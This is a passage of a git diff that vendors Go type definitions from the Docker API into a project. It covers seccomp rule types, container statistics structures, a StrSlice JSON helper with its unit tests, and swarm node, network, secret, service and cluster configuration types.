+	ArchS390        Arch = "SCMP_ARCH_S390"
+	ArchS390X       Arch = "SCMP_ARCH_S390X"
+)
+
+// Action taken upon Seccomp rule match
+type Action string
+
+// Define actions for Seccomp rules
+const (
+	ActKill  Action = "SCMP_ACT_KILL"
+	ActTrap  Action = "SCMP_ACT_TRAP"
+	ActErrno Action = "SCMP_ACT_ERRNO"
+	ActTrace Action = "SCMP_ACT_TRACE"
+	ActAllow Action = "SCMP_ACT_ALLOW"
+)
+
+// Operator used to match syscall arguments in Seccomp
+type Operator string
+
+// Define operators for syscall arguments in Seccomp
+const (
+	OpNotEqual     Operator = "SCMP_CMP_NE"
+	OpLessThan     Operator = "SCMP_CMP_LT"
+	OpLessEqual    Operator = "SCMP_CMP_LE"
+	OpEqualTo      Operator = "SCMP_CMP_EQ"
+	OpGreaterEqual Operator = "SCMP_CMP_GE"
+	OpGreaterThan  Operator = "SCMP_CMP_GT"
+	OpMaskedEqual  Operator = "SCMP_CMP_MASKED_EQ"
+)
+
+// Arg used for matching specific syscall arguments in Seccomp
+type Arg struct {
+	Index    uint     `json:"index"`
+	Value    uint64   `json:"value"`
+	ValueTwo uint64   `json:"valueTwo"`
+	Op       Operator `json:"op"`
+}
+
+// Filter is used to conditionally apply Seccomp rules
+type Filter struct {
+	Caps   []string `json:"caps,omitempty"`
+	Arches []string `json:"arches,omitempty"`
+}
+
+// Syscall is used to match a group of syscalls in Seccomp
+type Syscall struct {
+	Name     string   `json:"name,omitempty"`
+	Names    []string `json:"names,omitempty"`
+	Action   Action   `json:"action"`
+	Args     []*Arg   `json:"args"`
+	Comment  string   `json:"comment"`
+	Includes Filter   `json:"includes"`
+	Excludes Filter   `json:"excludes"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/service_update_response.go b/vendor/github.com/docker/docker/api/types/service_update_response.go
new file mode 100644
index 0000000000..74ea64b1bb
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/service_update_response.go
@@ -0,0 +1,12 @@
+package types
+
+// This file was generated by the swagger tool.
+// Editing this file might prove futile when you re-run the swagger generate command
+
+// ServiceUpdateResponse service update response
+// swagger:model ServiceUpdateResponse
+type ServiceUpdateResponse struct {
+
+	// Optional warning messages
+	Warnings []string `json:"Warnings"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/stats.go b/vendor/github.com/docker/docker/api/types/stats.go
new file mode 100644
index 0000000000..9bf1928b8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/stats.go
@@ -0,0 +1,178 @@
+// Package types is used for API stability in the types and response to the
+// consumers of the API stats endpoint.
+package types
+
+import "time"
+
+// ThrottlingData stores CPU throttling stats of one running container.
+// Not used on Windows.
+type ThrottlingData struct {
+	// Number of periods with throttling active
+	Periods uint64 `json:"periods"`
+	// Number of periods when the container hits its throttling limit.
+	ThrottledPeriods uint64 `json:"throttled_periods"`
+	// Aggregate time the container was throttled for in nanoseconds.
+	ThrottledTime uint64 `json:"throttled_time"`
+}
+
+// CPUUsage stores All CPU stats aggregated since container inception.
+type CPUUsage struct {
+	// Total CPU time consumed.
+	// Units: nanoseconds (Linux)
+	// Units: 100's of nanoseconds (Windows)
+	TotalUsage uint64 `json:"total_usage"`
+
+	// Total CPU time consumed per core (Linux). Not used on Windows.
+	// Units: nanoseconds.
+	PercpuUsage []uint64 `json:"percpu_usage,omitempty"`
+
+	// Time spent by tasks of the cgroup in kernel mode (Linux).
+	// Time spent by all container processes in kernel mode (Windows).
+	// Units: nanoseconds (Linux).
+	// Units: 100's of nanoseconds (Windows). Not populated for Hyper-V Containers.
+	UsageInKernelmode uint64 `json:"usage_in_kernelmode"`
+
+	// Time spent by tasks of the cgroup in user mode (Linux).
+	// Time spent by all container processes in user mode (Windows).
+	// Units: nanoseconds (Linux).
+	// Units: 100's of nanoseconds (Windows). Not populated for Hyper-V Containers
+	UsageInUsermode uint64 `json:"usage_in_usermode"`
+}
+
+// CPUStats aggregates and wraps all CPU related info of container
+type CPUStats struct {
+	// CPU Usage. Linux and Windows.
+	CPUUsage CPUUsage `json:"cpu_usage"`
+
+	// System Usage. Linux only.
+	SystemUsage uint64 `json:"system_cpu_usage,omitempty"`
+
+	// Throttling Data. Linux only.
+	ThrottlingData ThrottlingData `json:"throttling_data,omitempty"`
+}
+
+// MemoryStats aggregates all memory stats since container inception on Linux.
+// Windows returns stats for commit and private working set only.
+type MemoryStats struct {
+	// Linux Memory Stats
+
+	// current res_counter usage for memory
+	Usage uint64 `json:"usage,omitempty"`
+	// maximum usage ever recorded.
+	MaxUsage uint64 `json:"max_usage,omitempty"`
+	// TODO(vishh): Export these as stronger types.
+	// all the stats exported via memory.stat.
+	Stats map[string]uint64 `json:"stats,omitempty"`
+	// number of times memory usage hits limits.
+	Failcnt uint64 `json:"failcnt,omitempty"`
+	Limit   uint64 `json:"limit,omitempty"`
+
+	// Windows Memory Stats
+	// See https://technet.microsoft.com/en-us/magazine/ff382715.aspx
+
+	// committed bytes
+	Commit uint64 `json:"commitbytes,omitempty"`
+	// peak committed bytes
+	CommitPeak uint64 `json:"commitpeakbytes,omitempty"`
+	// private working set
+	PrivateWorkingSet uint64 `json:"privateworkingset,omitempty"`
+}
+
+// BlkioStatEntry is one small entity to store a piece of Blkio stats
+// Not used on Windows.
+type BlkioStatEntry struct {
+	Major uint64 `json:"major"`
+	Minor uint64 `json:"minor"`
+	Op    string `json:"op"`
+	Value uint64 `json:"value"`
+}
+
+// BlkioStats stores All IO service stats for data read and write.
+// This is a Linux specific structure as the differences between expressing
+// block I/O on Windows and Linux are sufficiently significant to make
+// little sense attempting to morph into a combined structure.
+type BlkioStats struct {
+	// number of bytes transferred to and from the block device
+	IoServiceBytesRecursive []BlkioStatEntry `json:"io_service_bytes_recursive"`
+	IoServicedRecursive     []BlkioStatEntry `json:"io_serviced_recursive"`
+	IoQueuedRecursive       []BlkioStatEntry `json:"io_queue_recursive"`
+	IoServiceTimeRecursive  []BlkioStatEntry `json:"io_service_time_recursive"`
+	IoWaitTimeRecursive     []BlkioStatEntry `json:"io_wait_time_recursive"`
+	IoMergedRecursive       []BlkioStatEntry `json:"io_merged_recursive"`
+	IoTimeRecursive         []BlkioStatEntry `json:"io_time_recursive"`
+	SectorsRecursive        []BlkioStatEntry `json:"sectors_recursive"`
+}
+
+// StorageStats is the disk I/O stats for read/write on Windows.
+type StorageStats struct {
+	ReadCountNormalized  uint64 `json:"read_count_normalized,omitempty"`
+	ReadSizeBytes        uint64 `json:"read_size_bytes,omitempty"`
+	WriteCountNormalized uint64 `json:"write_count_normalized,omitempty"`
+	WriteSizeBytes       uint64 `json:"write_size_bytes,omitempty"`
+}
+
+// NetworkStats aggregates the network stats of one container
+type NetworkStats struct {
+	// Bytes received. Windows and Linux.
+	RxBytes uint64 `json:"rx_bytes"`
+	// Packets received. Windows and Linux.
+	RxPackets uint64 `json:"rx_packets"`
+	// Received errors. Not used on Windows. Note that we dont `omitempty` this
+	// field as it is expected in the >=v1.21 API stats structure.
+	RxErrors uint64 `json:"rx_errors"`
+	// Incoming packets dropped. Windows and Linux.
+	RxDropped uint64 `json:"rx_dropped"`
+	// Bytes sent. Windows and Linux.
+	TxBytes uint64 `json:"tx_bytes"`
+	// Packets sent. Windows and Linux.
+	TxPackets uint64 `json:"tx_packets"`
+	// Sent errors. Not used on Windows. Note that we dont `omitempty` this
+	// field as it is expected in the >=v1.21 API stats structure.
+	TxErrors uint64 `json:"tx_errors"`
+	// Outgoing packets dropped. Windows and Linux.
+	TxDropped uint64 `json:"tx_dropped"`
+	// Endpoint ID. Not used on Linux.
+	EndpointID string `json:"endpoint_id,omitempty"`
+	// Instance ID. Not used on Linux.
+	InstanceID string `json:"instance_id,omitempty"`
+}
+
+// PidsStats contains the stats of a container's pids
+type PidsStats struct {
+	// Current is the number of pids in the cgroup
+	Current uint64 `json:"current,omitempty"`
+	// Limit is the hard limit on the number of pids in the cgroup.
+	// A "Limit" of 0 means that there is no limit.
+	Limit uint64 `json:"limit,omitempty"`
+}
+
+// Stats is Ultimate struct aggregating all types of stats of one container
+type Stats struct {
+	// Common stats
+	Read    time.Time `json:"read"`
+	PreRead time.Time `json:"preread"`
+
+	// Linux specific stats, not populated on Windows.
+	PidsStats  PidsStats  `json:"pids_stats,omitempty"`
+	BlkioStats BlkioStats `json:"blkio_stats,omitempty"`
+
+	// Windows specific stats, not populated on Linux.
+	NumProcs     uint32       `json:"num_procs"`
+	StorageStats StorageStats `json:"storage_stats,omitempty"`
+
+	// Shared stats
+	CPUStats    CPUStats    `json:"cpu_stats,omitempty"`
+	PreCPUStats CPUStats    `json:"precpu_stats,omitempty"` // "Pre"="Previous"
+	MemoryStats MemoryStats `json:"memory_stats,omitempty"`
+}
+
+// StatsJSON is newly used Networks
+type StatsJSON struct {
+	Stats
+
+	Name string `json:"name,omitempty"`
+	ID   string `json:"id,omitempty"`
+
+	// Networks request version >=1.21
+	Networks map[string]NetworkStats `json:"networks,omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice.go b/vendor/github.com/docker/docker/api/types/strslice/strslice.go
new file mode 100644
index 0000000000..bad493fb89
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/strslice/strslice.go
@@ -0,0 +1,30 @@
+package strslice
+
+import "encoding/json"
+
+// StrSlice represents a string or an array of strings.
+// We need to override the json decoder to accept both options.
+type StrSlice []string
+
+// UnmarshalJSON decodes the byte slice whether it's a string or an array of
+// strings. This method is needed to implement json.Unmarshaler.
+func (e *StrSlice) UnmarshalJSON(b []byte) error {
+	if len(b) == 0 {
+		// With no input, we preserve the existing value by returning nil and
+		// leaving the target alone. This allows defining default values for
+		// the type.
+		return nil
+	}
+
+	p := make([]string, 0, 1)
+	if err := json.Unmarshal(b, &p); err != nil {
+		var s string
+		if err := json.Unmarshal(b, &s); err != nil {
+			return err
+		}
+		p = append(p, s)
+	}
+
+	*e = p
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go
new file mode 100644
index 0000000000..1163b3652c
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go
@@ -0,0 +1,86 @@
+package strslice
+
+import (
+	"encoding/json"
+	"reflect"
+	"testing"
+)
+
+func TestStrSliceMarshalJSON(t *testing.T) {
+	for _, testcase := range []struct {
+		input    StrSlice
+		expected string
+	}{
+		// MADNESS(stevvooe): No clue why nil would be "" but empty would be
+		// "null". Had to make a change here that may affect compatibility.
+		{input: nil, expected: "null"},
+		{StrSlice{}, "[]"},
+		{StrSlice{"/bin/sh", "-c", "echo"}, `["/bin/sh","-c","echo"]`},
+	} {
+		data, err := json.Marshal(testcase.input)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(data) != testcase.expected {
+			t.Fatalf("%#v: expected %v, got %v", testcase.input, testcase.expected, string(data))
+		}
+	}
+}
+
+func TestStrSliceUnmarshalJSON(t *testing.T) {
+	parts := map[string][]string{
+		"":   {"default", "values"},
+		"[]": {},
+		`["/bin/sh","-c","echo"]`: {"/bin/sh", "-c", "echo"},
+	}
+	for json, expectedParts := range parts {
+		strs := StrSlice{"default", "values"}
+		if err := strs.UnmarshalJSON([]byte(json)); err != nil {
+			t.Fatal(err)
+		}
+
+		actualParts := []string(strs)
+		if !reflect.DeepEqual(actualParts, expectedParts) {
+			t.Fatalf("%#v: expected %v, got %v", json, expectedParts, actualParts)
+		}
+
+	}
+}
+
+func TestStrSliceUnmarshalString(t *testing.T) {
+	var e StrSlice
+	echo, err := json.Marshal("echo")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := json.Unmarshal(echo, &e); err != nil {
+		t.Fatal(err)
+	}
+
+	if len(e) != 1 {
+		t.Fatalf("expected 1 element after unmarshal: %q", e)
+	}
+
+	if e[0] != "echo" {
+		t.Fatalf("expected `echo`, got: %q", e[0])
+	}
+}
+
+func TestStrSliceUnmarshalSlice(t *testing.T) {
+	var e StrSlice
+	echo, err := json.Marshal([]string{"echo"})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := json.Unmarshal(echo, &e); err != nil {
+		t.Fatal(err)
+	}
+
+	if len(e) != 1 {
+		t.Fatalf("expected 1 element after unmarshal: %q", e)
+	}
+
+	if e[0] != "echo" {
+		t.Fatalf("expected `echo`, got: %q", e[0])
+	}
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/common.go b/vendor/github.com/docker/docker/api/types/swarm/common.go
new file mode 100644
index 0000000000..64a648bad1
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/common.go
@@ -0,0 +1,27 @@
+package swarm
+
+import "time"
+
+// Version represents the internal object version.
+type Version struct {
+	Index uint64 `json:",omitempty"`
+}
+
+// Meta is a base object inherited by most of the other once.
+type Meta struct {
+	Version   Version   `json:",omitempty"`
+	CreatedAt time.Time `json:",omitempty"`
+	UpdatedAt time.Time `json:",omitempty"`
+}
+
+// Annotations represents how to describe an object.
+type Annotations struct {
+	Name   string            `json:",omitempty"`
+	Labels map[string]string `json:",omitempty"`
+}
+
+// Driver represents a driver (network, logging).
+type Driver struct {
+	Name    string            `json:",omitempty"`
+	Options map[string]string `json:",omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/container.go b/vendor/github.com/docker/docker/api/types/swarm/container.go
new file mode 100644
index 0000000000..4ab476ccc3
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/container.go
@@ -0,0 +1,46 @@
+package swarm
+
+import (
+	"time"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
+)
+
+// DNSConfig specifies DNS related configurations in resolver configuration file (resolv.conf)
+// Detailed documentation is available in:
+// http://man7.org/linux/man-pages/man5/resolv.conf.5.html
+// `nameserver`, `search`, `options` have been supported.
+// TODO: `domain` is not supported yet.
+type DNSConfig struct {
+	// Nameservers specifies the IP addresses of the name servers
+	Nameservers []string `json:",omitempty"`
+	// Search specifies the search list for host-name lookup
+	Search []string `json:",omitempty"`
+	// Options allows certain internal resolver variables to be modified
+	Options []string `json:",omitempty"`
+}
+
+// ContainerSpec represents the spec of a container.
+type ContainerSpec struct {
+	Image           string                  `json:",omitempty"`
+	Labels          map[string]string       `json:",omitempty"`
+	Command         []string                `json:",omitempty"`
+	Args            []string                `json:",omitempty"`
+	Hostname        string                  `json:",omitempty"`
+	Env             []string                `json:",omitempty"`
+	Dir             string                  `json:",omitempty"`
+	User            string                  `json:",omitempty"`
+	Groups          []string                `json:",omitempty"`
+	TTY             bool                    `json:",omitempty"`
+	OpenStdin       bool                    `json:",omitempty"`
+	Mounts          []mount.Mount           `json:",omitempty"`
+	StopGracePeriod *time.Duration          `json:",omitempty"`
+	Healthcheck     *container.HealthConfig `json:",omitempty"`
+	// The format of extra hosts on swarmkit is specified in:
+	// http://man7.org/linux/man-pages/man5/hosts.5.html
+	//    IP_address canonical_hostname [aliases...]
+	Hosts     []string           `json:",omitempty"`
+	DNSConfig *DNSConfig         `json:",omitempty"`
+	Secrets   []*SecretReference `json:",omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/network.go b/vendor/github.com/docker/docker/api/types/swarm/network.go
new file mode 100644
index 0000000000..5a5e11bdba
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/network.go
@@ -0,0 +1,111 @@
+package swarm
+
+// Endpoint represents an endpoint.
+type Endpoint struct {
+	Spec       EndpointSpec        `json:",omitempty"`
+	Ports      []PortConfig        `json:",omitempty"`
+	VirtualIPs []EndpointVirtualIP `json:",omitempty"`
+}
+
+// EndpointSpec represents the spec of an endpoint.
+type EndpointSpec struct {
+	Mode  ResolutionMode `json:",omitempty"`
+	Ports []PortConfig   `json:",omitempty"`
+}
+
+// ResolutionMode represents a resolution mode.
+type ResolutionMode string
+
+const (
+	// ResolutionModeVIP VIP
+	ResolutionModeVIP ResolutionMode = "vip"
+	// ResolutionModeDNSRR DNSRR
+	ResolutionModeDNSRR ResolutionMode = "dnsrr"
+)
+
+// PortConfig represents the config of a port.
+type PortConfig struct {
+	Name     string             `json:",omitempty"`
+	Protocol PortConfigProtocol `json:",omitempty"`
+	// TargetPort is the port inside the container
+	TargetPort uint32 `json:",omitempty"`
+	// PublishedPort is the port on the swarm hosts
+	PublishedPort uint32 `json:",omitempty"`
+	// PublishMode is the mode in which port is published
+	PublishMode PortConfigPublishMode `json:",omitempty"`
+}
+
+// PortConfigPublishMode represents the mode in which the port is to
+// be published.
+type PortConfigPublishMode string
+
+const (
+	// PortConfigPublishModeIngress is used for ports published
+	// for ingress load balancing using routing mesh.
+	PortConfigPublishModeIngress PortConfigPublishMode = "ingress"
+	// PortConfigPublishModeHost is used for ports published
+	// for direct host level access on the host where the task is running.
+	PortConfigPublishModeHost PortConfigPublishMode = "host"
+)
+
+// PortConfigProtocol represents the protocol of a port.
+type PortConfigProtocol string
+
+const (
+	// TODO(stevvooe): These should be used generally, not just for PortConfig.
+
+	// PortConfigProtocolTCP TCP
+	PortConfigProtocolTCP PortConfigProtocol = "tcp"
+	// PortConfigProtocolUDP UDP
+	PortConfigProtocolUDP PortConfigProtocol = "udp"
+)
+
+// EndpointVirtualIP represents the virtual ip of a port.
+type EndpointVirtualIP struct {
+	NetworkID string `json:",omitempty"`
+	Addr      string `json:",omitempty"`
+}
+
+// Network represents a network.
+type Network struct {
+	ID string
+	Meta
+	Spec        NetworkSpec  `json:",omitempty"`
+	DriverState Driver       `json:",omitempty"`
+	IPAMOptions *IPAMOptions `json:",omitempty"`
+}
+
+// NetworkSpec represents the spec of a network.
+type NetworkSpec struct {
+	Annotations
+	DriverConfiguration *Driver      `json:",omitempty"`
+	IPv6Enabled         bool         `json:",omitempty"`
+	Internal            bool         `json:",omitempty"`
+	Attachable          bool         `json:",omitempty"`
+	IPAMOptions         *IPAMOptions `json:",omitempty"`
+}
+
+// NetworkAttachmentConfig represents the configuration of a network attachment.
+type NetworkAttachmentConfig struct {
+	Target  string   `json:",omitempty"`
+	Aliases []string `json:",omitempty"`
+}
+
+// NetworkAttachment represents a network attachment.
+type NetworkAttachment struct {
+	Network   Network  `json:",omitempty"`
+	Addresses []string `json:",omitempty"`
+}
+
+// IPAMOptions represents ipam options.
+type IPAMOptions struct {
+	Driver  Driver       `json:",omitempty"`
+	Configs []IPAMConfig `json:",omitempty"`
+}
+
+// IPAMConfig represents ipam configuration.
+type IPAMConfig struct {
+	Subnet  string `json:",omitempty"`
+	Range   string `json:",omitempty"`
+	Gateway string `json:",omitempty"`
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/node.go b/vendor/github.com/docker/docker/api/types/swarm/node.go
new file mode 100644
index 0000000000..379e17a779
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/node.go
@@ -0,0 +1,114 @@
+package swarm
+
+// Node represents a node.
+type Node struct {
+	ID string
+	Meta
+	// Spec defines the desired state of the node as specified by the user.
+	// The system will honor this and will *never* modify it.
+	Spec NodeSpec `json:",omitempty"`
+	// Description encapsulates the properties of the Node as reported by the
+	// agent.
+	Description NodeDescription `json:",omitempty"`
+	// Status provides the current status of the node, as seen by the manager.
+	Status NodeStatus `json:",omitempty"`
+	// ManagerStatus provides the current status of the node's manager
+	// component, if the node is a manager.
+	ManagerStatus *ManagerStatus `json:",omitempty"`
+}
+
+// NodeSpec represents the spec of a node.
+type NodeSpec struct {
+	Annotations
+	Role         NodeRole         `json:",omitempty"`
+	Availability NodeAvailability `json:",omitempty"`
+}
+
+// NodeRole represents the role of a node.
+type NodeRole string
+
+const (
+	// NodeRoleWorker WORKER
+	NodeRoleWorker NodeRole = "worker"
+	// NodeRoleManager MANAGER
+	NodeRoleManager NodeRole = "manager"
+)
+
+// NodeAvailability represents the availability of a node.
+type NodeAvailability string
+
+const (
+	// NodeAvailabilityActive ACTIVE
+	NodeAvailabilityActive NodeAvailability = "active"
+	// NodeAvailabilityPause PAUSE
+	NodeAvailabilityPause NodeAvailability = "pause"
+	// NodeAvailabilityDrain DRAIN
+	NodeAvailabilityDrain NodeAvailability = "drain"
+)
+
+// NodeDescription represents the description of a node.
+type NodeDescription struct {
+	Hostname  string            `json:",omitempty"`
+	Platform  Platform          `json:",omitempty"`
+	Resources Resources         `json:",omitempty"`
+	Engine    EngineDescription `json:",omitempty"`
+}
+
+// Platform represents the platform (Arch/OS).
+type Platform struct {
+	Architecture string `json:",omitempty"`
+	OS           string `json:",omitempty"`
+}
+
+// EngineDescription represents the description of an engine.
+type EngineDescription struct {
+	EngineVersion string              `json:",omitempty"`
+	Labels        map[string]string   `json:",omitempty"`
+	Plugins       []PluginDescription `json:",omitempty"`
+}
+
+// PluginDescription represents the description of an engine plugin.
+type PluginDescription struct {
+	Type string `json:",omitempty"`
+	Name string `json:",omitempty"`
+}
+
+// NodeStatus represents the status of a node.
+type NodeStatus struct {
+	State   NodeState `json:",omitempty"`
+	Message string    `json:",omitempty"`
+	Addr    string    `json:",omitempty"`
+}
+
+// Reachability represents the reachability of a node.
+type Reachability string
+
+const (
+	// ReachabilityUnknown UNKNOWN
+	ReachabilityUnknown Reachability = "unknown"
+	// ReachabilityUnreachable UNREACHABLE
+	ReachabilityUnreachable Reachability = "unreachable"
+	// ReachabilityReachable REACHABLE
+	ReachabilityReachable Reachability = "reachable"
+)
+
+// ManagerStatus represents the status of a manager.
+type ManagerStatus struct {
+	Leader       bool         `json:",omitempty"`
+	Reachability Reachability `json:",omitempty"`
+	Addr         string       `json:",omitempty"`
+}
+
+// NodeState represents the state of a node.
+type NodeState string
+
+const (
+	// NodeStateUnknown UNKNOWN
+	NodeStateUnknown NodeState = "unknown"
+	// NodeStateDown DOWN
+	NodeStateDown NodeState = "down"
+	// NodeStateReady READY
+	NodeStateReady NodeState = "ready"
+	// NodeStateDisconnected DISCONNECTED
+	NodeStateDisconnected NodeState = "disconnected"
+)
diff --git a/vendor/github.com/docker/docker/api/types/swarm/secret.go b/vendor/github.com/docker/docker/api/types/swarm/secret.go
new file mode 100644
index 0000000000..fdb2388888
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/secret.go
@@ -0,0 +1,31 @@
+package swarm
+
+import "os"
+
+// Secret represents a secret.
+type Secret struct {
+	ID string
+	Meta
+	Spec SecretSpec
+}
+
+// SecretSpec represents a secret specification from a secret in swarm
+type SecretSpec struct {
+	Annotations
+	Data []byte `json:",omitempty"`
+}
+
+// SecretReferenceFileTarget is a file target in a secret reference
+type SecretReferenceFileTarget struct {
+	Name string
+	UID  string
+	GID  string
+	Mode os.FileMode
+}
+
+// SecretReference is a reference to a secret in swarm
+type SecretReference struct {
+	File       *SecretReferenceFileTarget
+	SecretID   string
+	SecretName string
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/service.go b/vendor/github.com/docker/docker/api/types/swarm/service.go
new file mode 100644
index 0000000000..2cf2642c1f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/service.go
@@ -0,0 +1,105 @@
+package swarm
+
+import "time"
+
+// Service represents a service.
+type Service struct {
+	ID string
+	Meta
+	Spec         ServiceSpec  `json:",omitempty"`
+	PreviousSpec *ServiceSpec `json:",omitempty"`
+	Endpoint     Endpoint     `json:",omitempty"`
+	UpdateStatus UpdateStatus `json:",omitempty"`
+}
+
+// ServiceSpec represents the spec of a service.
+type ServiceSpec struct {
+	Annotations
+
+	// TaskTemplate defines how the service should construct new tasks when
+	// orchestrating this service.
+	TaskTemplate TaskSpec      `json:",omitempty"`
+	Mode         ServiceMode   `json:",omitempty"`
+	UpdateConfig *UpdateConfig `json:",omitempty"`
+
+	// Networks field in ServiceSpec is deprecated. The
+	// same field in TaskSpec should be used instead.
+	// This field will be removed in a future release.
+	Networks     []NetworkAttachmentConfig `json:",omitempty"`
+	EndpointSpec *EndpointSpec             `json:",omitempty"`
+}
+
+// ServiceMode represents the mode of a service.
+type ServiceMode struct {
+	Replicated *ReplicatedService `json:",omitempty"`
+	Global     *GlobalService     `json:",omitempty"`
+}
+
+// UpdateState is the state of a service update.
+type UpdateState string
+
+const (
+	// UpdateStateUpdating is the updating state.
+	UpdateStateUpdating UpdateState = "updating"
+	// UpdateStatePaused is the paused state.
+	UpdateStatePaused UpdateState = "paused"
+	// UpdateStateCompleted is the completed state.
+	UpdateStateCompleted UpdateState = "completed"
+)
+
+// UpdateStatus reports the status of a service update.
+type UpdateStatus struct {
+	State       UpdateState `json:",omitempty"`
+	StartedAt   time.Time   `json:",omitempty"`
+	CompletedAt time.Time   `json:",omitempty"`
+	Message     string      `json:",omitempty"`
+}
+
+// ReplicatedService is a kind of ServiceMode.
+type ReplicatedService struct {
+	Replicas *uint64 `json:",omitempty"`
+}
+
+// GlobalService is a kind of ServiceMode.
+type GlobalService struct{}
+
+const (
+	// UpdateFailureActionPause PAUSE
+	UpdateFailureActionPause = "pause"
+	// UpdateFailureActionContinue CONTINUE
+	UpdateFailureActionContinue = "continue"
+)
+
+// UpdateConfig represents the update configuration.
+type UpdateConfig struct {
+	// Maximum number of tasks to be updated in one iteration.
+	// 0 means unlimited parallelism.
+	Parallelism uint64
+
+	// Amount of time between updates.
+	Delay time.Duration `json:",omitempty"`
+
+	// FailureAction is the action to take when an update failures.
+	FailureAction string `json:",omitempty"`
+
+	// Monitor indicates how long to monitor a task for failure after it is
+	// created. If the task fails by ending up in one of the states
+	// REJECTED, COMPLETED, or FAILED, within Monitor from its creation,
+	// this counts as a failure. If it fails after Monitor, it does not
+	// count as a failure. If Monitor is unspecified, a default value will
+	// be used.
+	Monitor time.Duration `json:",omitempty"`
+
+	// MaxFailureRatio is the fraction of tasks that may fail during
+	// an update before the failure action is invoked. Any task created by
+	// the current update which ends up in one of the states REJECTED,
+	// COMPLETED or FAILED within Monitor from its creation counts as a
+	// failure. The number of failures is divided by the number of tasks
+	// being updated, and if this fraction is greater than
+	// MaxFailureRatio, the failure action is invoked.
+	//
+	// If the failure action is CONTINUE, there is no effect.
+	// If the failure action is PAUSE, no more tasks will be updated until
+	// another update is started.
+	MaxFailureRatio float32
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/swarm.go b/vendor/github.com/docker/docker/api/types/swarm/swarm.go
new file mode 100644
index 0000000000..0b42219696
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/swarm.go
@@ -0,0 +1,197 @@
+package swarm
+
+import "time"
+
+// ClusterInfo represents info about the cluster for outputing in "info"
+// it contains the same information as "Swarm", but without the JoinTokens
+type ClusterInfo struct {
+	ID string
+	Meta
+	Spec Spec
+}
+
+// Swarm represents a swarm.
+type Swarm struct {
+	ClusterInfo
+	JoinTokens JoinTokens
+}
+
+// JoinTokens contains the tokens workers and managers need to join the swarm.
+type JoinTokens struct {
+	// Worker is the join token workers may use to join the swarm.
+	Worker string
+	// Manager is the join token managers may use to join the swarm.
+	Manager string
+}
+
+// Spec represents the spec of a swarm.
+type Spec struct {
+	Annotations
+
+	Orchestration    OrchestrationConfig `json:",omitempty"`
+	Raft             RaftConfig          `json:",omitempty"`
+	Dispatcher       DispatcherConfig    `json:",omitempty"`
+	CAConfig         CAConfig            `json:",omitempty"`
+	TaskDefaults     TaskDefaults        `json:",omitempty"`
+	EncryptionConfig EncryptionConfig    `json:",omitempty"`
+}
+
+// OrchestrationConfig represents orchestration configuration.
+type OrchestrationConfig struct {
+	// TaskHistoryRetentionLimit is the number of historic tasks to keep per instance or
+	// node. If negative, never remove completed or failed tasks.
+	TaskHistoryRetentionLimit *int64 `json:",omitempty"`
+}
+
+// TaskDefaults parameterizes cluster-level task creation with default values.
+type TaskDefaults struct {
+	// LogDriver selects the log driver to use for tasks created in the
+	// orchestrator if unspecified by a service.
+	//
+	// Updating this value will only have an affect on new tasks. Old tasks
+	// will continue use their previously configured log driver until
+	// recreated.
+	LogDriver *Driver `json:",omitempty"`
+}
+
+// EncryptionConfig controls at-rest encryption of data and keys.
+type EncryptionConfig struct {
+	// AutoLockManagers specifies whether or not managers TLS keys and raft data
+	// should be encrypted at rest in such a way that they must be unlocked
+	// before the manager node starts up again.
+	AutoLockManagers bool
+}
+
+// RaftConfig represents raft configuration.
+type RaftConfig struct {
+	// SnapshotInterval is the number of log entries between snapshots.
+	SnapshotInterval uint64 `json:",omitempty"`
+
+	// KeepOldSnapshots is the number of snapshots to keep beyond the
+	// current snapshot.
+	KeepOldSnapshots *uint64 `json:",omitempty"`
+
+	// LogEntriesForSlowFollowers is the number of log entries to keep
+	// around to sync up slow followers after a snapshot is created.
+	LogEntriesForSlowFollowers uint64 `json:",omitempty"`
+
+	// ElectionTick is the number of ticks that a follower will wait for a message
+	// from the leader before becoming a candidate and starting an election.
+	// ElectionTick must be greater than HeartbeatTick.
+	//
+	// A tick currently defaults to one second, so these translate directly to
+	// seconds currently, but this is NOT guaranteed.
+	ElectionTick int
+
+	// HeartbeatTick is the number of ticks between heartbeats. Every
+	// HeartbeatTick ticks, the leader will send a heartbeat to the
+	// followers.
+	//
+	// A tick currently defaults to one second, so these translate directly to
+	// seconds currently, but this is NOT guaranteed.
+	HeartbeatTick int
+}
+
+// DispatcherConfig represents dispatcher configuration.
+type DispatcherConfig struct {
+	// HeartbeatPeriod defines how often agent should send heartbeats to
+	// dispatcher.
+	HeartbeatPeriod time.Duration `json:",omitempty"`
+}
+
+// CAConfig represents CA configuration.
+type CAConfig struct {
+	// NodeCertExpiry is the duration certificates should be issued for
+	NodeCertExpiry time.Duration `json:",omitempty"`
+
+	// ExternalCAs is a list of CAs to which a manager node will make
+	// certificate signing requests for node certificates.
+	ExternalCAs []*ExternalCA `json:",omitempty"`
+}
+
+// ExternalCAProtocol represents type of external CA.
+type ExternalCAProtocol string
+
